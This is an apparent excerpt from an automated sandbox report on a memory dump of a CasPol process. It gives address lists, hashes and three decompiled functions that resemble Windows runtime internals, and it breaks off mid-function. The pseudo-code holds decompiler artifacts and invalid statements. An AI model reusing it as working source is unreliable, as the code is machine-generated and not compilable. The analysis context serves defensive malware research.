                                                                  0x014659ee
                                                                  0x014659ee
                                                                  0x014659f3
                                                                  0x014659f3
                                                                  0x00000000
                                                                  0x01422186
                                                                  0x0142214f
                                                                  0x01422106
                                                                  0x01422266
                                                                  0x014220d8
                                                                  0x014220da
                                                                  0x014220e0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                                                                  • Instruction ID: 606ae82affb9712f391994365a13805a694cd65e8e304f7269cfa75a69470aec
                                                                  • Opcode Fuzzy Hash: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                                                                  • Instruction Fuzzy Hash: ADF144306083128FDB26CB2CC440B2B7BE5AF95368F54851FE9949B3B1D7B4C881CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142513A Relevance: .3, Instructions: 258COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E0142513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x14ed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0143D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01412280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01414620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0143F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0140FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x14eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L0143B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                  0x01425142
                                                                  0x0142514c
                                                                  0x01425150
                                                                  0x01425157
                                                                  0x01425159
                                                                  0x0142515e
                                                                  0x01425165
                                                                  0x01425169
                                                                  0x0142516c
                                                                  0x01425172
                                                                  0x01425176
                                                                  0x0142517a
                                                                  0x0142517a
                                                                  0x0142517a
                                                                  0x0142517f
                                                                  0x01466d8b
                                                                  0x01466d8e
                                                                  0x01466d91
                                                                  0x01466d95
                                                                  0x01466d98
                                                                  0x01466d9c
                                                                  0x01466da0
                                                                  0x01466da3
                                                                  0x01466da7
                                                                  0x01466e26
                                                                  0x01466e26
                                                                  0x01466e2a
                                                                  0x014251f9
                                                                  0x014251f9
                                                                  0x014251fe
                                                                  0x01466e33
                                                                  0x01466e33
                                                                  0x01466e39
                                                                  0x01466e3d
                                                                  0x01466e46
                                                                  0x01466e50
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466e52
                                                                  0x01466e53
                                                                  0x01466e56
                                                                  0x01466e5d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466e5f
                                                                  0x01466e67
                                                                  0x01466e77
                                                                  0x01466e7f
                                                                  0x01466e80
                                                                  0x01466e88
                                                                  0x01466e90
                                                                  0x01466e9f
                                                                  0x01466ea5
                                                                  0x01466ea9
                                                                  0x01466eb1
                                                                  0x01466ebf
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466ecf
                                                                  0x01466ed3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466edb
                                                                  0x01466ede
                                                                  0x01466ee1
                                                                  0x01466ee8
                                                                  0x01466eeb
                                                                  0x01466eed
                                                                  0x01466ef0
                                                                  0x01466ef4
                                                                  0x01466ef8
                                                                  0x01466efc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466f0d
                                                                  0x01466f11
                                                                  0x01466f32
                                                                  0x01466f37
                                                                  0x01466f3b
                                                                  0x01466f3e
                                                                  0x01466f41
                                                                  0x01466f46
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466f4c
                                                                  0x01466f50
                                                                  0x01466f50
                                                                  0x01466f54
                                                                  0x01466f62
                                                                  0x01466f65
                                                                  0x01466f6d
                                                                  0x01466f7b
                                                                  0x01466f7b
                                                                  0x01466f93
                                                                  0x01466f98
                                                                  0x01466fa0
                                                                  0x01466fa6
                                                                  0x01466fb3
                                                                  0x01466fb6
                                                                  0x01466fbf
                                                                  0x01466fc1
                                                                  0x01466fd5
                                                                  0x01466fda
                                                                  0x01466fda
                                                                  0x01466fdd
                                                                  0x01466fe2
                                                                  0x01466fe7
                                                                  0x01466feb
                                                                  0x01466fef
                                                                  0x01466ff3
                                                                  0x0142520c
                                                                  0x0142520c
                                                                  0x0142520f
                                                                  0x01425215
                                                                  0x01425234
                                                                  0x0142523a
                                                                  0x0142523a
                                                                  0x01425244
                                                                  0x01425245
                                                                  0x01425246
                                                                  0x01425251
                                                                  0x01425251
                                                                  0x01466f13
                                                                  0x01466f17
                                                                  0x01466f17
                                                                  0x01466f18
                                                                  0x01466f1b
                                                                  0x01466f1f
                                                                  0x01466f23
                                                                  0x00000000
                                                                  0x01466f28
                                                                  0x01425204
                                                                  0x01425204
                                                                  0x01425208
                                                                  0x00000000
                                                                  0x01425208
                                                                  0x01425185
                                                                  0x01425188
                                                                  0x0142518a
                                                                  0x0142518e
                                                                  0x01425195
                                                                  0x01466db1
                                                                  0x01466db5
                                                                  0x01466db9
                                                                  0x0142519b
                                                                  0x0142519b
                                                                  0x0142519e
                                                                  0x014251a7
                                                                  0x014251a9
                                                                  0x014251a9
                                                                  0x014251b5
                                                                  0x014251b8
                                                                  0x014251bb
                                                                  0x014251be
                                                                  0x014251c1
                                                                  0x014251c5
                                                                  0x014251c9
                                                                  0x014251cd
                                                                  0x014251cd
                                                                  0x014251d8
                                                                  0x014251dc
                                                                  0x014251e0
                                                                  0x01466dcc
                                                                  0x01466dd0
                                                                  0x01466dd5
                                                                  0x01466ddd
                                                                  0x01466de1
                                                                  0x01466de1
                                                                  0x01466de5
                                                                  0x01466deb
                                                                  0x01466df1
                                                                  0x01466df7
                                                                  0x01466dfd
                                                                  0x01466e01
                                                                  0x01466e05
                                                                  0x01466e09
                                                                  0x01466e0d
                                                                  0x01466e11
                                                                  0x01466e11
                                                                  0x014251eb
                                                                  0x01466e1a
                                                                  0x01466e1f
                                                                  0x01466e21
                                                                  0x01466e23
                                                                  0x00000000
                                                                  0x014251f1
                                                                  0x014251f1
                                                                  0x00000000
                                                                  0x014251f1

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                                                                  • Instruction ID: 18f8e0ee8044a99b4e03af22e75430c5579ab70372ba2718540448aa55b6accd
                                                                  • Opcode Fuzzy Hash: ba30266cf1bc6bb02e9e06e385b8c5dd7c12d6bf1b7bc4312e3857ac9d51a4f8
                                                                  • Instruction Fuzzy Hash: 9DC122755083818FD354CF28C580A6AFBF1BF88318F14496EF9998B362D771E885CB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014203E2 Relevance: .3, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 74%
                                                                  			E014203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x14ed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01420548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L0143B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0140B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x14e7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01417D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01417D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01477016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01439830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E014769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x14e7c04 != 0) {
						_t118 = _v12;
						_t120 = L0147A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x14e7bd8;
						if( *0x14e7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E014395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E014399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01473540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E013FB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0143AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x14e8474 - 3;
										if( *0x14e8474 != 3) {
											 *0x14e79dc =  *0x14e79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01417D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01417D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01477016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x14e8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x14e7b00; // 0x0
							asm("ror esi, cl");
							 *0x14eb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E014395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L01407F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                  0x014203f1
                                                                  0x014203f7
                                                                  0x014203f9
                                                                  0x014203fb
                                                                  0x014203fd
                                                                  0x01420400
                                                                  0x0142040a
                                                                  0x01464c7a
                                                                  0x01420537
                                                                  0x01420547
                                                                  0x01420410
                                                                  0x01420410
                                                                  0x01420414
                                                                  0x01420417
                                                                  0x0142041a
                                                                  0x01420421
                                                                  0x01420424
                                                                  0x0142042b
                                                                  0x0142043b
                                                                  0x0142043e
                                                                  0x0142043f
                                                                  0x0142043f
                                                                  0x01420446
                                                                  0x01420449
                                                                  0x0142044c
                                                                  0x0142044f
                                                                  0x01420459
                                                                  0x01464c8d
                                                                  0x0142045f
                                                                  0x0142045f
                                                                  0x0142045f
                                                                  0x01420467
                                                                  0x01464c97
                                                                  0x01464c9d
                                                                  0x01464ca4
                                                                  0x01464caa
                                                                  0x01464caf
                                                                  0x01464cb1
                                                                  0x01464cc3
                                                                  0x01464cb3
                                                                  0x01464cbc
                                                                  0x01464cbc
                                                                  0x01464cc8
                                                                  0x01464ccb
                                                                  0x01464cd7
                                                                  0x01464cda
                                                                  0x01464cdf
                                                                  0x01464cdf
                                                                  0x01464ccb
                                                                  0x01464ca4
                                                                  0x0142046d
                                                                  0x0142046f
                                                                  0x0142046f
                                                                  0x01420471
                                                                  0x01420476
                                                                  0x0142047a
                                                                  0x0142047b
                                                                  0x01420483
                                                                  0x01420489
                                                                  0x0142048d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464ce9
                                                                  0x01464cef
                                                                  0x01464d22
                                                                  0x01464d22
                                                                  0x00000000
                                                                  0x01464d22
                                                                  0x01464cf1
                                                                  0x01464cf7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464cf9
                                                                  0x01464cff
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d05
                                                                  0x01464d07
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d0d
                                                                  0x01464d0f
                                                                  0x01464d14
                                                                  0x01464d16
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d1c
                                                                  0x01464d1c
                                                                  0x01420499
                                                                  0x01420535
                                                                  0x01420535
                                                                  0x00000000
                                                                  0x01420535
                                                                  0x014204a6
                                                                  0x01464d2c
                                                                  0x01464d37
                                                                  0x01464d39
                                                                  0x01464d3b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d41
                                                                  0x01464d48
                                                                  0x01420527
                                                                  0x0142052b
                                                                  0x0142052d
                                                                  0x01420530
                                                                  0x01420530
                                                                  0x00000000
                                                                  0x0142052b
                                                                  0x01464d4e
                                                                  0x014204ac
                                                                  0x014204ac
                                                                  0x014204af
                                                                  0x014204b2
                                                                  0x014204b7
                                                                  0x014204b9
                                                                  0x014204bb
                                                                  0x014204bd
                                                                  0x014204bf
                                                                  0x014204c5
                                                                  0x014204c9
                                                                  0x01464d53
                                                                  0x01464d59
                                                                  0x01464db9
                                                                  0x01464dba
                                                                  0x01464dbf
                                                                  0x01464dc2
                                                                  0x01464dc4
                                                                  0x01464dc7
                                                                  0x01464dce
                                                                  0x00000000
                                                                  0x01464dce
                                                                  0x01464d5b
                                                                  0x01464d61
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d63
                                                                  0x01464d69
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464d6b
                                                                  0x01464d6e
                                                                  0x01464d74
                                                                  0x01464d76
                                                                  0x01464d7c
                                                                  0x01464d7e
                                                                  0x01464d84
                                                                  0x01464d89
                                                                  0x01464d8c
                                                                  0x01464d8d
                                                                  0x01464d92
                                                                  0x01464d95
                                                                  0x01464d96
                                                                  0x01464d98
                                                                  0x01464d9a
                                                                  0x01464d9f
                                                                  0x01464da4
                                                                  0x01464da6
                                                                  0x01464da8
                                                                  0x01464daf
                                                                  0x01464db1
                                                                  0x01464db1
                                                                  0x01464daf
                                                                  0x01464da6
                                                                  0x01464d84
                                                                  0x01464d7c
                                                                  0x00000000
                                                                  0x01464d74
                                                                  0x014204d6
                                                                  0x01464de1
                                                                  0x014204dc
                                                                  0x014204dc
                                                                  0x014204dc
                                                                  0x014204e4
                                                                  0x01464deb
                                                                  0x01464df1
                                                                  0x01464df8
                                                                  0x01464dfe
                                                                  0x01464e03
                                                                  0x01464e05
                                                                  0x01464e17
                                                                  0x01464e07
                                                                  0x01464e10
                                                                  0x01464e10
                                                                  0x01464e1c
                                                                  0x01464e1f
                                                                  0x01464e35
                                                                  0x01464e35
                                                                  0x01464e1f
                                                                  0x01464df8
                                                                  0x014204f1
                                                                  0x014204fa
                                                                  0x01464e3f
                                                                  0x01464e47
                                                                  0x01464e5b
                                                                  0x01464e61
                                                                  0x01464e67
                                                                  0x01464e69
                                                                  0x01464e71
                                                                  0x01464e73
                                                                  0x01420500
                                                                  0x01420500
                                                                  0x01420500
                                                                  0x014204fa
                                                                  0x01420508
                                                                  0x0142051d
                                                                  0x0142051d
                                                                  0x0142051f
                                                                  0x01420524
                                                                  0x00000000
                                                                  0x01420524
                                                                  0x01420515
                                                                  0x01420517
                                                                  0x01464e7a
                                                                  0x01464e7c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01464e85
                                                                  0x00000000
                                                                  0x01464e85
                                                                  0x00000000
                                                                  0x01420517

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                                                                  • Instruction ID: 9937a6579c114c9d93779900bad9e0a952108caeb909d8fb6ca40d4b26def4a3
                                                                  • Opcode Fuzzy Hash: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                                                                  • Instruction Fuzzy Hash: E8910B71E002259BEF219A6DC844BAE7BE8AB14728F490267F910A73F1D7749D81C781
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0148B8D0 Relevance: .2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 39%
                                                                  			E0148B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x14e7b9c; // 0x0
				_t124 = L01414620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01439800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									L014395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E014395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L014177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01439910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E014395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
